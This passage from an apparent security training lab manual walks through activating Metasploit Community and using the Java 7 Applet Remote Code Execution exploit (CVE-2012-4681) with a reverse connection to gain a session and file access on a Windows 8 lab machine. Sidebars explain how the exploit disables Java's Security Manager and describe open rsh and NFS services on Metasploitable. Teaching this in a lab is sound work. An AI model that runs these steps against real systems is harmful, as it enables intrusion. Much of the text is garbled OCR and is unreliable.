MethodFinder. findMethod(
). Both were newly
introduced in JD K 7.
ClassFinder is a
replacement for
classForName back in JD K

N r a l ,when yout y oc n e tscrl,:t. p e e tt e s dietfcto t p o et a y
omly
i t o n c euey ir wi r s n r s e dniiain c r v h t cu
a eg i gt t en h pa e H » e e .ti st' ■ e & yc ntbevrfe.
r o n o h g t lc . o > v r hs ies d r t a
ersd
What Should 1 Do?
Iyou u u l yc n e tt ti st w t o tp
f
s a l o n c o hs ie i h u roblem^fv « ‫*״‬ec>d mun tvtsomeone i ty n t
ls 0
ij
s ri g o
i p r o a et est andyous o l n tc n i u .
m e s n t h ie
h u d ' otne
[ Gel me o l f e e
uohtl
Technical Details
|

1Understand the Risks |

6.

FIG U RE 3.1: Metasploit Untrusted connection in web browser

4.

C lick A dd E x c e p tio n .

|+
1
£

* ? ▼ C ‫(ן‬
f
JJ* G o l
oge

& hts• k c K » . V'
tp:1 > * x t .

This Connection is Untrusted

It allows untrusted code to
obtain a reference and have
access to a restricted
package in JD K 7, which
can be used to abuse
sun.awt.SunToolkit (a
restricted package).

You h v • k d‫ג/ז ז‬t c n o t1«1u‫׳‬l 10
a e t t ‫ סיי‬o o n c
«>
c n e t o i sc .
o n c i n ‫«10 * ׳‬
>

*
1

1 0 tj
9. t

c ntc n i m h ty u
• ofrta ot

N rmlly w rnyoutrytoe n e ik u t*e»w pnwKtru ‫* י‬Menrep v th ty u
o a , ih
o n rt rrty
M
ftrd
ro e a o
art g in toth u h p 1« Ilwrt, tlmt!t«1 itfrMj « ‫ י‬U
o g e g ( la .
«l
What Should I Do?

Ifyo u a co n toth S w o tp b - v th moi to•Ji mun tK tso e n ntryin to
u su lly n ed is ite rth i/ ‫׳‬o k ‫׳‬n . r,
« mo e
g
ime n teth a , an yo sh u n e n u .
p rso a e te d u o ld 't o tme
| Gelmeoulolhetel
Technical Details
IUnderstand the Risks

I Add Excepaoi

FIG U R E 3.2: Metasploit Adding Exceptions

5.


111 th e A dd S e c u r ity E x c e p tio n w iz ard , click C o n firm S e c u r ity E x c e p tio n .



1‫ *־‬I

Add S c r t E c p i n
euiy x e t o
You are about to override how Firefox identifies this site.
!

Legitimate banks, stores, and other public sites will not ask you to do this.

Server
Location: I liR M M H B M M fe M I

With sun.awt.SunToolkit,
we can actually invoke
getFieldQ by abusing
findMethod() in
StatementiavokeIntemal0
(but getFieldO must be
public, and that's not
always die case in JD K 6)
in order to access
Statement.acc's private
field, modify
AccessControlContext, and
then disable Security
Manager.

Certificate Status
This site attempts to identify itself with invalid information.
Wrong Site
Certificate belongs to a different site, which could indicate an identity theft.
Unknown Identity
Certificate is not trusted, because it hasn't been verified by a recognized authority
using a secure signature.

@ Permanently store this exception
| Confirm Security Exception |

Cancel

FIG U R E 3.3: Metasploit Add Security Exception

6.

O n d ie M e ta sp lo it — S e tu p a n d C o n fig u ra tio n L o g in scree n , e n te r te x t 111 d ie
U s e rn a m e . P a s s w o r d , a n d P a s s w o r d c o n firm a tio n fields a n d click C r e a te
A c c o u n t.

k- M Vti .

Once Security Manager is
disabled, we can execute
arbitrary Java code. Our
exploit has been tested
successfully against
multiple platforms,
including: IE , Firefox,
Safari, Chrome; Windows,
Ubuntu, OS X , Solaris, etc.

(Jlmetasploit

Password coafinrrtc••

Optional I f & S t i g
no etns
Em address
ail
orgaattillon
I
(QMT«00:00) UTC‫־‬

| Q C t« Auwni
10a

FIG U RE 3.4: Metasploit Creating an Account

7.

C lick G ET PROD UCT KEY 111 d ie M e ta s p lo it - A c tiv a te M e ta s p lo it
w in d o w .

P r o d u c t K ey
A c tiv a tio n




This Security Alert
addresses security issues
CYE-2012-4681 '(USC ERT Alert TA12-240A
and Vulnerability Note
VU#636312) and two
other vulnerabilities
affecting Java running in
web browsers on desktops.

E n te r y o u r v a lid em ail a d d re ss 111 th e M e ta s p lo it C o m m u n ity o p tio n a n d
click GO.

‫־‬F !
mv r g i « * ? t p ^ « x u t k y If‫׳‬t » n BtLutName i t rsldii c 0 g ■
e a e t s o - p p ^ J c _ * ‫ ־‬k> N r e
j
S LniAdei « 1 » ‫׳‬

These vulnerabilities are
not applicable to Java
running on servers or
standalone Java desktop
applications. They also do
not affect Oracle serverbased software.

Choose between two FREE Metasploit Offers

()
Jmetasploit

G metasploit
D

M
etatplotl Prohetpt + *! * ‫ גי‬IT
am
p
r0fe1»10 m*‫ >*»•«:׳‬c‫ ♦*־‬u t
nal•
‫*־‬
breatftet b emaer*, corvoxanq
y
broad tcope p
enefcatio tests pnottong
n
«yin*‫־‬jD111t*1 .*no *nfyns C 0*0*1 tnc
0
m
itigat&r!

M
ct.1r.p Com unityEd io tim
10H m
M n plifiot
n«ACfK «»< ‫ ׳‬anovu
c‫*/׳‬r
lnerab
ility
vm
ifkaaon far specific eiplolta Increasing
Ihe effectiveness o vulnerabilityscanners
f
»ucnasNe®o*e‫־‬rortree

~ com unity
m

M
etasploit ComTun‫״‬v plus
•
/
•
f
J
‫'׳י‬
‫'׳י‬

Snan ejpK U
M bsn
Password ijd*r;
W 0appiisa!:‫ ר׳‬scam a
e
.Social eng»eerw»3
Tear*coH o»a*on
ab
R• rting
po
S Enterpnse-lew su o
t pp rt

S

✓ FREE EDITION

OR

J
S
■S
■
/

N orkdlscoveiy
etw
vlea i i yscann9 I p r
unr b l t
r mot
Ba i epo t t o
s c xli a i n
M ule firovw
od
ef

Lnterem address:
ail
___________ < ail.com Go 1
ggm
|||

1»u«s «‫ י«י‬Vas pass0 Piease em infoQ
ail
rapid7 c
<

These vulnerabilities may
be remotely exploitable
without authentication, i.e.,
they may be exploited over
a network without the need
for a username and
password.


FIG U R E 3.6: Metasploit Community version for License Key

9.

N o w lo g in to y o u r em ail a d d re ss a n d c o p y d ie licen se key as s h o w n 111 d ie
fo llo w in g figure.



Your Metasploit Community Edition Product Key
Bates, Ariana anana_bates@raptd7 com vis bounces netsuite com

To be successfully
exploited, an unsuspecting
user running an affected
release in a browser will
need to visit a malicious
web page that leverages tins
vulnerability. Successful
exploits can impact the
availability, integrity, and
confidentiality of the user's
system.

‫ם! ק‬
6:27 P M (0 minutes ago)

to me ■
‫׳‬

■ Rap1d7
r

Metasploit Product Key

WNMW-J8KJ-X3TW-RN68

Thank you for choosing Rapid7® Metasploit® Community Edition Metasploit Community Edition
simplifies network discovery and vulnerability verification for specific exploits, increasing the
effectiveness of vulnerability scanners such as Nexpose -for free
Your license is valid for one year and expires on 11/15/2013 When your license runs out, you can
simply apply for a new license using the same registration mechanism.____________________________

FIG U RE 3.7: Metasploit License Key in you! email ID provided

10. P a ste d ie p r o d u c t k ey a n d click N e x t to c o n tin u e .
Due to die severity of these
vulnerabilities, die public
disclosure of teclinical
details and die reported
exploitation of CVE-20124681 "in die wild," Oracle
strongly recommends diat
customers apply die
updates provided by this
Security Alert as soon as
possible.

t_ _ « l x ‫ד‬

M t s f i P o u tK r
eapot r d c e

«a!>0t- l- e ,i^?p0d rt= 1m rn !»th R h !% A 2 2 calh «TL A ?9 L F e jp L » a :- *w
1 tria i<y » r u a u P U l= rtp 3 % F% fIo o ‫ 3 ׳‬T (W2s t1 3i>rtv l< ‫»*« ׳‬e t;
A

‫־‬fc
‫־‬

.‫1,־־־־ •1־‬
‫־‬

p*

c-

(J)metasploit
4 More Steps To Get Started
1 Copy t e ProductKey from theemail we j s sent yo .
.
h
ut
u
2 Paste the Product Key here: [WM.nv jskj x3tw r n 68T
3 Click Next on this page
.
4 Then dick Activate License on the next page
.

The Metasploit Framework
will always be free and
open source. The
Metasploit Project and
Rapid7 are fully committed
to supporting and growing
the Metasploit Framework
as well as providing
advanced solutions for
users who need an
alternative to developing
dieir own penetration
testing tools. It's a promise.


FIG U R E 3.8: Metasploit Activating using License Key

11. C lick A c tiv a te L ic e n s e to a ctiv ate d ie M e ta sp lo it license.



I. , n r ,
f

A ■.» to o SC!*.. ,■ ■ . .,'p.oc..:>cy W W-.0 l- 3T -RN S«ib H '
• (.. ceh afcA .*
NM < X W 68& m

C

•
‘I

(‫?־־״‬I.

(J)m
etasploit'
H ie Metasploit Framework
will always be free and
open source. Tlie
Metasploit Project and
Rapid7 are fully committed
to supporting and growing
die Metasploit Framework
as well as providing
advanced solutions for
users who need an
alternative to developing
their own penetration
testing tools. It's a promise.

Activate Your Metasploit License
1 Get Your Product Key
.
Chooseme po l c ta b s ntedsj w r e d M t s i i P oo te r eM t s l i CommunityE i i n ‫ז‬y 3 r a >r * a commgn^ tfalorMil c n ep o u tk/» uc nsupti s e
rf u l ht e t
< r » e s e a p o l r r h fe e a p o t
d t o ‫ ז‬ou i e 0 a t
ies rdc e o a
hs l p

2 Enter ProductKey You've Received by Email
.

1

13 9 0

P s ■ ep dcfet* lwss nto « ‫ / <׳<יז־‬ure is r dv ‫ ו‬a dd kth ATWEL E S OH‫״‬
a te n rout cj‫ ־‬a a e t fte
th
J ‫־‬
ss g tee « n ic e C T IC N E uo

|1WJt-3WR6
wW-6UXT-N8
D U•a HT P t*torec r»
s n T P ra at!

FIG U RE 3.9: Metasploit Activation
Tlie Metasploitable virtual
machine is an intentionally
vulnerable version of
Ubuntu Linus designed for
testing security tools and
demonstrating common
vulnerabilities. Version 2 of
diis virtual machine is
available for download
from Soiuceforge.net and
ships with even more
vulnerabilities than the
original image. This virtual
machine is compatible with
VMWare, VirtualBox, and
odier common
virtualization platforms.

12. T lie A c tiv a tio n S u c c e s s f u l w in d o w ap p ears.
1^

A hips/ lot*t> . 90
ost

' ' 7‫ י‬C ‫)ן‬

‫ ־‬Google

P

#

E ~I

, m i 1 1 i^ ic - io p iw i 1
community

I
1

H e
om

Protect*

1

| ^

Activation Successful

1

^aeto^ofen

& H«e H w Panel
f- *

J

0

%rsr^t

Q ut* *ojrct

Starch

1 / Product Mr*‫*׳‬
Abating Window* Kemot• Management (WinUM) with Metasploit

thow ‫ 1, — י‬ml 0
y
I

□ (to r
lau
S vo m 1 to1of 1 t«n n
T wg

II

0

0

0

»» 6
y1m

0

?0m■ •
‫ ׳‬jhM 90
Fm I Pi«.vk«j» 1
h

*•«!

laM

I cnem
gnt.il D ,con Mu&lianill *leredlacuaaingvariouiledvvquMof
erb
mass crw
nage W M b to m about theW
hen u ci ld e
inRMservice 1w
ondered ■ h
Wji
d n'twe nav• an M
o
y ateap m
toit odui•* ro
rthia

‫ן‬

Fxploit Trends: Top to Searches for MotAsploit Module* in October
T to row m
1r»e r
cnthl/dose 01 M
etasploite»p !t (renas* Each m n w jarfh ns
lo
o th e
er
11st err* m searched eaioit ana a x ry m
ost
u ilia odules fro tns M
m
etaspor.
e‫ ידי‬aa*e T p tect userso ro
privacyt..
Weekly Metasploit Update: WinRM Part One, Exploiting Metasploit. and
More!
W
inRMEx lo Library Form lastcoupleweeks M
p it
e
etasplolt coreoanV iJto D .*d
i& i a‫־‬
©
iTieugWCosin8M
alone/has & living in McrosoffsWinRMservices w
«en
to i
fln
$m
u:«x and@ n3r. UnO
_sm
lttiese..
Weekly Metasploit Update: Microsoft Windows and SQL. TurboFTP. end
M
ore?
*ccSecUSA20l2Lastweekwas AppSecUSA2012here m ustin. ivtiid‫ ־‬m
A
at‫׳‬
exstair‫וזז‬scunous aosenceofaweeKtrMetaspioitupoateDioapost Tn*n«grfis o
f
A jec fo m !w re pnno particular
pp
r e, e
IU-... ...

FIG U R E 3.10: Metasploit Activation Successful

as T A S K

13. G o to A d m in is tra tio n a n d click S o f tw a r e U p d a te s .

3

U p d a tin g
M e ta s p lo it

e

X

• •
•

| softw upaates
are
Softw ucense
are

community1

H e
om

•*| - G
oogle

P

it

D•

A inhtinlio T ^
dm
n

(‫)״‬m
etasploit
Project*

‫ו‬
1

& H eb«w* Pan«1
id

1

1 a ” a3- »

FIG U R E 3.11: Metasploit Updating Software

14. C lick C h e c k f o r U p d a te s , a n d a fte r c h e c k in g d ie u p d a te s , click In s ta ll.




By default, Metasploitable's
network interfaces are
bound to die N A T and
Host-only network
adapters, and the image
should never be exposed to
a hostile network. (Note: A
video tutorial on installing
Metasploitable 2 is available
at die link Tutorial on
installing Metasploitable 2.0
on a Virtual Box Host Only
network)

FIG U R E 3.12: Metasploit Checking for Updates

15. A fte r c o m p le tin g th e u p d a te s it w ill a sk y o u to re sta rt, so click R e s ta r t.

This document outlines
many of the security flaws
in die Metasploitable 2
image. Currendy missing is
documentation on the web
server and web application
flaws as well as
vulnerabilities diat allow a
local user to escalate to
root privileges. This
document will continue to
expand over time as many
of die less obvious flaws
widi diis platform are
detailed.

16. W a it u n til M e ta sp lo it restarts.




1A I'tlpiJ'locaVrat.

^

■w

x

TCP ports 512, 513, arid
514 are known as "r"
services, and have been
misconfigured to allow
remote access from any
host (a standard ".rhosts +
+" situation). To take
advantage of diis, make
sure the "rsh-client" client
is installed (on Ubuntu),
and run die following
command as your local
root user. If you are
prompted for an SSH key,
this means die rsh-client
tools have not been
installed and Ubuntu is
defaulting to using SSH.

- I- G o l
• eg,

■‫יי־׳וי‬

fi ft

c-

I you've just finished i s a l n Metasploit. the application
f
ntlig
w l now take up to 5 minutes to i i i l z . ir* normal il
ntaie
please b« patient and have a c f e . .
ofe.
‫ ו‬you nave already been usingtne p o u t *is message may
‫ז‬
rdc,
p i t t a bog i the a p i a i n and r q i ethe M t s l i
on o
n
plcto
eur
eapot
s r ices tobe r s a t dto resume lunctocaity
ev
etre
I the problem p r i t you may want toconsul the Mowing
f
esss
r
esources.
• Metasploit Community Edition users: Pease v o ti
t l re
R*pid7 Security street forum• toseaxnf ra s e so
o nwr r
po t a question
s
• Metasploit t i l users: Please contactyour Rap«f7 sales
ra
rep e e t t v oreni ■1fnqrjwd7.com
r s n a i e ta
• Metasploit users with a support contract: Ptcasc vst
ii
t Rapld7 Customer Canter t f ca supportease o
he
oB
r
*man suPD0rtgraD1d7.c0m

Retrying your request I 5 seconds .
n
.

FIG U R E 3.14: Metasploit Restarts

17. A fte r c o m p le tio n o f re s ta rt it w ill re d ire c t to M e ta s p lo it - H o m e. N o w click
C r e a te N e w P r o je c t fro m d ie P r o je c t d ro p - d o w n list.
C re a tin g a N e w
M e ta s p lo it P r o je c t

‫זזד‬

• ‫ ־‬e a p x -P o e t
* M t s K t rjcs

..‫■-״‬TP

© etasploit
m

:• tNwr jet
m e Po c

community

y M l Nt v Pmw(
k e tv a
1 S ' v U P10j c s
to* l »t
I

act * o r
o ■jn

Mo

■
Show 1 V •il l
0
Ml M
«Q
lame
u
< 1
'‫״‬Showing1K>1 o
f

,

j Search

Q m niict

s

4 Pro u tMews
dc

1

Abusing Window* Remote Management (WlnRM) with M t s l i
eapot
Horn
: ‫נ‬

Atv s s i n
crc e s o s

t s s owner Memoera
ak
o
•sa
ytm 0

Upared
w oescnpoo
• e t1how a o
bu
g
Pnmam I ■wt l»i

lato onenight 3 O
1 artiyco . M b andl w dtsaisslngvarious techniques o
n u tx
oto
r
mass wm
aoe WhenMutmtoldmea&outtheWinRMseivice.iwonoeiea ■ h
W»
a we hM a M t seon m
ort
ny e a
odulestorm
is...
E p o t T e d : Top 10 Searches l r Me a p o t Modules i October
xli rns
o tsli
n
Tim teryo m
•
ur onthsdose o M
f etasploit e p ittrends! Each m nwe 0a > 1s
x lo
ow
V ertn
tstortne m searches e p itand aux m
ost
x lo
iliary odules iromtneM
etasploit
dataoase Toprotedusers' prtacy, 1
.
.
Weekly M t s
e a ploit Update: WinRM PartOne, E p o t n Metasploit and
xliig
More!
•V UE«ploit LibraryFor theI3sl couplew
inR
eeks. M
etasploit core co trib to D
n u r avid
gTheLicficCcsm M
e aloneyh3s D d oin M so W RMserw:es w
een r«in to icro ft's m
ith
grm and @
icor
_s1nn3r U til these...
n

This is about as easy as it
gets. The nest service we
should look at is die
Network File System
(NFS). N FS can be
identified by probing port
2049 directly or asking the
portmapper for a list of
services. The example
below using rpcinfo to
identify N FS and
showmount -e to determine
diat die "/" share (the root
of die file system) is being
exported.


Weekly Me a p o t Update: Miaosoft Windows and SQL, TurboFTP, and
tsli
Mote!
*ppSecOSA2012 Last w was AppSecUSA2012here InA , *filch ro
eek
ustin
a*
ex lain•re curious absence o aweeklyM
p
f
etasploit U
pdate bloe poslThe tal H o
js f
*wsecfcrme. were (mnop
articu r...
la
Weekly Me a p o t Update: Reasonnble d s l s r . PHP FXF wrappers,
tsli
icoue
and moie!

FIG U RE 3.15: Metasploit Creating a New Project

18. 111 P r o je c t S e ttin g s , p ro v id e th e P r o je c t N a m e a n d e n te r a D e s c rip tio n ,
leave th e N e tw o rk R a n g e set to its d efau lt, a n d click C r e a te P ro je c t.



I. , n r ,

‫־‬
n
^

A ‫,־‬Ip. lo
.
calho V. a.
it.

▼

3 & ar

SB

(‫]״‬m
etasploit
community1

H ie Metasploit Framework
is a penetration testing
system
and development platform
diat you can use to create
security tools and exploits.
The
Metasploit Framework is
written in Ruby and
includes components in C
and assembler.
The Metasploit Framework
consists of tools, libraries,
modules, and user
interfaces. Tire
basic function of die
Metasploit Framework is a
module launcher diat
allows die user to
configure an exploit
module and launch the
exploit against a target
svstem.

Protect nam
e*
D
escription

‫ ׳‬Exploit |
a
The e p o ttakes advantage oft r iss e i JDK 7 The ClassFinder and
xli
io u s n
MethodFinder nndMemod() Botn were newly introduced i JOK 7 dassFinder i a
n
s
replacement f rc a s . x f r gback i JQg 6 R alows untnisted code t oOtam a
o isFiNln
n
o
reference ana nave access t a r s r c e oa:o?e rJ K7 ‫ ׳‬e can oe used t aDuse
o etitd
O .a n
m
o
suna^-SuoJoolKit (a r srcled package) / ! ‫ו‬sun ^SunTwiwt we can a t a l invoke
e
/®
culy

Networ*r n e
ag

Q RvttiKt tonetworkrange

•*? R A P I D 7

FIG U R E 3.16: Metasploit Project Settings

19. C lick d ie M o d u le s ta b a fte r d ie p ro je c t is created .
W
fl»5f40T I ^

A hcp/ lot»t>
fl s
ost. SC

|+™
.

£? ▼ C | ?§ ‫ ־‬G
oogle
■

1 m
(U etasploit
I

£ P o e t Javatx_ * ‫ ־‬Account Jason e f A m n s r t o r
rtc
i diitain

fi
rt community

community

|4kOvervle«v 4* ‫י‬Analysis
1 H rn
o •

Java Lx to
p it

Sessions

Campaigns

* Wt*b Apps
•

|«& Modules |
»

lags

Q) Reports

JZ 1
■1

#

j> H l
ep

C ' 1
^
I
*1‫י‬
*

0itwnr

J ” Overvtew.ProperJavaT
ipto■
Discovery

1

Penetration

01 01 dt*C M 4
143 O fC
0 services dctaclod
0vum
eraDM t *•utm
M
ed

^ Scan-

aw nrt— j * ■a^mm— ,
p

Evidence Collection
I

0 data friesacqaned

iai C
oeect...
1

Recent Event*

• MMlOHCpNtd
0 pHtimilt cracked
0 SMB Msr »s ttotee
0 SSHk*r* stu ka

0jroc
«tt>c

"

Q fiplat

Cleanup
OctoHdMssoas

Cleanep-

----------------------------------------------------------

FIG U R E 3.17: Metasploit Modules Tab

«

TASK

5

20. E n te r CVE ID (2012-4681) in S e a r c h M o d u le s a n d click E n te r.

R u n n in g t h e
E x p lo it




Metasploit P 1‫ ־‬contains
o
tasks, such as bruteforce
and discovery, in the form
of
modules. The modules
automate the functionality
diat die Metasploit
Framework provides
and enables you to perform
multiple tasks
simultaneously.

'‫־‬

‫־‬F I

,'MrtMf** M
odu»«
^

C

A h t s t o b i . V a .ii » c _ ‫ ׳‬o u e
tp o l o t ? c v ' d*5

*!I C009l«

H V

(‫]״‬m
etasploit
▼

community1

ft Overview

Analysis

Sessions

■ Campaigns
,}

* ‫ י‬Web Apps

Search Modules

« ‫ ׳‬Modules
i>

Tags

r, Reports

~ Tasks

2012-4681

M d le Sta
o u tisticsshow Se rchK o s sh w
a eyw rd o
Found 10 m
atchingm
odules
M
oduleType
A iery
uw
1 AiMlffy
Srv»r Expbi

O
S
ra
ra

Ckafipaae?0‫ ג זו‬localm m
e clisonvunerawty
WW
M fee*fln«S4cuty4lfln
69er 550r# ‫׳‬y T rsa
cto rave l

* A ‫י״‬

D dooiie O t•
H
u
Z-***rZS. Z
32
zrm»r-9.zv12
:: M r ‫2102.•־‬

»wn1C
‫־‬gmS«wty Uanaer‫־‬Plu 5 b iM
s .5 u "05 SQ In c n
L je tio

*M i

iVndew Lssalal* Serve•Prm
s
*s«jns Lo l PnvitgeEtcalato
ca
n

A “

< •ei ncr **•rary >•u n Vurem
* (»
■
* p ad
boy

‫ ייי‬A

>c1ta p • RvM iar ;!IC Bam •C d > clto
H.- M
C X o • 4• n

OcMar t. 2 1
02

S*‫ ׳•«׳‬Use*

*• w

TirtoHP $ « 0 2 3 3 ‫ד ׳«.־׳‬PO TO
0
R vrltow

1 S*‫׳‬v•‫ ׳‬L>
1W

‫—ן‬
♦ m
tm

516
63

0e
«*^».‫־10־‬

S»rv*‫׳‬fnpW

0SVD6
07•
62
853
66

★★

C;•*•‫2 0 3׳‬
.2 1
Swfc• 2 .2 1
5 02

ED
S
zztei
220»
294
20

2.*tor ,i. 2012

serverIKPW

M
odule Ran o
klo

U»Ot

1
1

I

Ctnt Up**
Ser^rfKpM

cro*yA<)n 31Z2 M «r_»ync p D cW o
T
‫״‬
1‫׳‬e a o r
«*SI2O 3lftcrg nMrnet U oc•! **ecC n aiH U - lto r• V tn ab y
C
»o
w
o tn J w A r-f • g w M

» ‫יי‬

‫2102.»' *־' *•■־‬
‫•י •* ״‬
1 .2012
4

Ah l*M Q taiK (tttxf C m n f»ee h n
a cr
o mS uo

?IMS

★ ★★★★
KMT
2012 *m

mm
MfiU

<« < <*

•. RAPID7
.*
?

A project is die logical
component diat provides
die intelligent defaults,
penetration testing
workflow, and modulespecific guidance dating the
penetration test.

FIG U R E 3.18: Metasploit Searching forJava Exploit

21. C lick d ie J a v a 7 A p p le t R e m o te C o d e E x e c u tio n 1111k.
■‫־‬Mta lo -McdM
* e sp it
^

A httpi. Iotat>
ost. S .v.-tepscev-'r-odule
C

c >1

(‫־‬
1

—

(‫]״‬m
etasploit

S t id ‫־‬

Y community

ft Overview

n Analysis

Sessions

‫ ־‬Campaigns
,/

Search Modules

#‫ י‬Web Apps

*y Modules

Tags

^ Hcpoiu

^ Tasks

201? 4081
M
odule Statutes show Searrh trywrrds s
i

WirJuk Typv

B
ID

C
lint

O B
SVD

C6
0

BBT
46

‫ «׳‬AodKR rro C« r!*• u O7
a l• ol« C tb

•'.'RAPID7

111 addition to the
capabilities offered by the
open source framework,
Metasploit Pro delivers a
full graphical user interface,
automated exploitation
capabilities,
complete user action audit
logs, custom reporting,
combined widi an
advanced penetration
testing workflow.

FIG U R E 3.19: MetasploitJava 7 Applet Remote Code Execution Exploit found

22. C o n fig u re d ie ex p lo it settings:
a.

111 P a y lo a d O p tio n s set d ie C o n n e c tio n T y p e as R e v e r s e a n d 111
L is te n e r H o s t ,e n te r d ie IP a d d re ss w h e re M e ta sp lo it is ru n n in g .

b.

111 M o d u le O p tio n s , e n te r d ie SR V H o s t I P ad d re ss w h e re M e ta sp lo it is
ru n n in g .

c.

E n te r d ie URI P a th (in d iis la b w e are u sin g greetin g s) a n d click R un
M od u le.




^

James forsnaw
|duck<
Jduckgrnetasp*o«c£im
»
slnnV 'enn3/^m
et3sp*0* 0 *n
&>
iuan .aiquei
<)uanva:que:@m
Masp:s!::c‫״‬r‫־‬

C

A ‫• ׳‬It , !onlhoit -V a j iipo.c, 2A*i‘~ k
-‫״‬
- -

T
I
j

(‫־״‬
‫?־‬I.

m rm
m
n
3

o/e
SoJa‫״‬
rjetll
The m dule is (*signedtoruninthob gro d ox lo n diemsj‫׳‬sterns 3sin•ycomod. h ■ c3s«0 «‫«׳‬Cbrow e p its,
o
acK un . p ib g
w
1
ser x lo
:•?as‫ ־‬setne U 1 T ocoonD
R PA H
elowityouwantio co
ntrol w URL is usecio nos»t> eg** T srvport co«or can & used
hich
6
‫־‬s
e
» cf!a < m I3tenng per inm case o passve u8M m
n ;e e
e
t
y odules(auxaary) m moaae caput‫ ואו‬se *31ae iromne T log alter
e
asic
vw m iSu has t»«n started
o te

IPv6 is die latest version of
die Internet Protocol
designed by die Internet
Engineering Task
Force to replace die current
version of IPv4. The
implementation of IPv6
predominantly
impacts addressing, routing,
security, and services.

Target Sefltogs
I Generic (Java Payload) v|

s*yb V
»a1 p•

Interpreter

v|

LttonwPwH |1aW
-€6S3S
UllOMrHMl 11Q001Q

C n o flo T • |Reverse vj
o n c o yp

j

T •bcil p rtto!• no . Ip
h
o
to n o't)
N «w5 1 1 rneiynrj eonnectan*(M
«gM 5 0
et)
P '.hto* cu mSSL c rtlfcirtolO fo I* tnO
a
clo
o
o al
e
5 o ‫׳‬V th vo o 0< th ) • o k toM
©c o rw n SSL e h o )
od

a SS.2 SSO USIX

T oU u oto ttu o p t 1 0'ajt * im M
h RIto o r » x to 3
AdvancedO t o sshow
pin
ivaMoa opooas snow

1
o
FIG U R E 3.20: Metasploit Running Module

23. T h e ta sk is s ta rte d as s h o w n 111 th e fo llo w in g sc re e n sh o t.
^ A hd i. Io o t - X v.i390con-le•p t*t> s

c ■
’
§

(‫־‬
1

(‫]״‬m
etasploit
community

In Metasploit Pro, you can
define IPv6 addresses for
target hosts. For example,
when you
perform a discovery scan,
scan a web application,
execute a bruteforce attack,
or run a
module, you can define an
IPv6 address for die target
hosts. For modules,
Metasploit Pro
provides several payloads
diat provide IPv6 support
for Windows x86, Linux
x86, BSD x86,
PH P, and cmd.

f Overview
t

ga A a y i
nlss

m
Upton

in ti

[_ SmioM

. Campaigns
/

* Web Apps
■

V Module*

lags

3 Reports

~ Tasks Q

Imk

5U‫׳‬to J 2 1 IMS 1 0 S LT
< 32
413 C

FIG U R E 3.21: Metasploit Task Started

24. N o w sw itch to W in d o w s 8 V irtu a l M acliu ie, la u n c h d ie C h ro m e b ro w se r
a n d e n te r h t t p : / / 10.0.0 .1 0 :8 0 8 0 /g re e tin g s in d ie a d d re ss b a r a n d p re ss
E n te r.
25. C lick d ie R un t h i s ti m e fo r Ja v a (T M ) w a s b lo c k e d b e c a u s e it is o u t o f
d a t e p r o m p t 111 d ie C h ro m e b ro w se r.




‫י‬

"

Window*; 8 on WIN‫?־‬N9ST0SG!FN * Virtual Machine Connprtion

Fl A t o Medi« Clpboard View Hdp
ie c i n

‫׳‬j

O (. ® O

II I► >3 i>

«‫ *- ־‬C □ 1 Q .1 t8 8 /g
0 0 0 0 0 reetin s/
g
i f JavafTM) was blockec because it is out of date

Update plug-in...

Run this time

Note: Metasploit Pro does
not support IPv6 for link
local broadcast discovery,
social
engineering, or pivoting.
However, you can import
IPv6 addresses from a text
file or you
can manually add them to
your project. If you import
IPv6 addresses from a text
file,
you must separate each
address with a new line.

FIG U R E 3.22: Windows 8 Virtual Machine —
Running die Exploit

26. N o w sw itch to y o u r W in d o w s S e rv e r 2 0 1 2 h o s t m ac liin e a n d c h e c k d ie
M e ta sp lo it ta sk p a n e . M e ta sp lo it w ill sta rt c a p tu rin g d ie re v e rse c o n n e c tio n
fro m d ie ta rg e t m acliin e.
^ A h K/ Ci»« 9 p * » pcv t»
ti|>/'lo* cti7Q'1oi3«c£ W

^7

▼C1

1

Gole
og

G community1
D etasploit'
m
b Overview

Analysis

.‫ ־‬Sessions

Campaigns

*‫ ־‬Web Apps

Modules

lags

_j Reports

i _ Tasks 0

Project Management
A Metasploit Pro project
contains die penetration test
diat you want to nm. A
project defines
die target systems, network
boundaries, modules, and
web campaigns diat you
want to
include in die penetration
test. Additionally, within a
project, you can use
discovery scan to
identify target systems and
bruteforce to gain access to
systems.
FIG U R E 3.23: Metasploit Capturing die reverse connection of targeted macliine

27. C lick d ie S e s s i o n s ta b to v ie w d ie c a p tu re d c o n n e c tio n o f d ie ta rg e t
m acliin e.




User Management
Administrators can assign
user roles to manage the
level of access that the user
has to
projects and administrative
tasks. You can manage user
accounts from tire
Administration
menu.

FIG U R E 3.24: Metasploit Session tab

28. C lick d ie c a p tu re d se ssio n to v ie w d ie in f o rm a tio n o f a ta rg e t m a c h in e as
s h o w n 111 d ie fo llo w in g sc re e n sh o t.
‫י - ן‬a ‫ ״‬x ‫י‬
A .Ip loiaNmt. '!C
i;•

1‫ ׳‬r,

e

oogle
•1 ‫ ־‬G

____ p { •

‫-ם‬

Gm
D etasploit
community

Overview
M rn
o *

M Aiiolyv) I ~ Sessions Q

Java Ixptvt

ttCoM

^ Cufiipulgns

V Web Ap|n
f>

V Modules

lags

£, Reports

£1 Tasks Q

ttiinni

(J C a p
Mfw

Active Sessions
O
S

| *SCMM1
Closed Sessions

Global Settings
Global settings define
settings that all projects use.
You can access global
settings from the
Administration menu.
From the global settings,
you can set the payload type
for the modules and enable
access to
die diagnostic console
through a web browser.
Additionally, from global
settings, you can create A P I
keys, post-exploitation
macros,
persistent listeners, and
Nexpose Consoles.


Ma
ot

J #012 100

1
Ueissploit C m
om une? 4 .0-U dato2 1 103 1
.4
&
0 2 10

‫-׳‬W ad
ndew

Type
M tw re r
e p te

Age

4
mm

0vet1«(kj1
1
*• ‫ר‬Q ‫ * ׳‬s
*■ .v vm
e

© 10-2012Rp Inc.B 3 *U
20
8itf7 0 K *

A
ttack M d lo
ou
+ JAW_JRE17JLXEC

RAPID7

FIG U R E 3.25: Metasploit Captured Session of a Target Machine

29. Y o u c a n v ie w d ie in f o rm a tio n o f th e ta rg e t m a ch in e .



System Management
As ail administrator, you can
update die license key and
perform software updates.
You can
access die system
management tools from the
Administration menu.

FIG U R E 3.26: Metasploit Target Machine System information
Host Scan
A host scan identifies
vulnerable systems within
die target network range diat
you define.
When you perform a scan,
Metasploit Pro provides
information about die
services,
vulnerabilities, and captured
evidence for hosts that the
scan discovers. Additionally,
you can
add vulnerabilities, notes,
tags, and tokens to identified
hosts.

30. T o access d ie tiles o f d ie ta rg e t sy stem , click A c c e s s F ile s y s te m .
I

-ea1‫״‬
Ss c
c >1

